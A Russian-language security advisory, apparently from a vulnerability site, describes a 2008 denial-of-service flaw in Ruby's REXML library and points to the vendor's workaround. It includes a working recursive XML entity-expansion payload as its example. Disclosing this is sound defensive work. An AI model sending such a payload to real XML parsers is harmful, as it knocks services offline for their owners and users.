Уязвимости Отказ в обслуживании в Ruby
| Дата публикации: | 27.08.2008 |
| Дата изменения: | 03.09.2008 |
| Всего просмотров: | 1092 |
| Опасность: | Средняя |
| Наличие исправления: | Инстуркции по устранению |
| Количество уязвимостей: | 1 |
| CVSSv2 рейтинг: | |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | |
| Уязвимые продукты: |
Ruby 1.8.x
Ruby 1.9.x |
Описание:
Уязвимость позволяет удаленному пользователю произвести DoS атаку.
Уязвимость существует из-за ошибки в библиотеке REXML при обработке рекурсивно разветвленных XML данных. Удаленный пользователь может с помощью специально сформированного XML документа вызвать отказ в обслуживании приложения. Пример:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
<!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
<!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
URL производителя: www.ruby-lang.org/en/
Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временного решения производитель рекомендует использовать дополнительный сценарий в приложениях, использующих REXML.
Ссылки:
http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/
Блоги
TOP Новости 
Уязвимости 09 февраля, 2012
07 февраля, 2012
06 февраля, 2012
03 февраля, 2012
Подписка
Вирусы 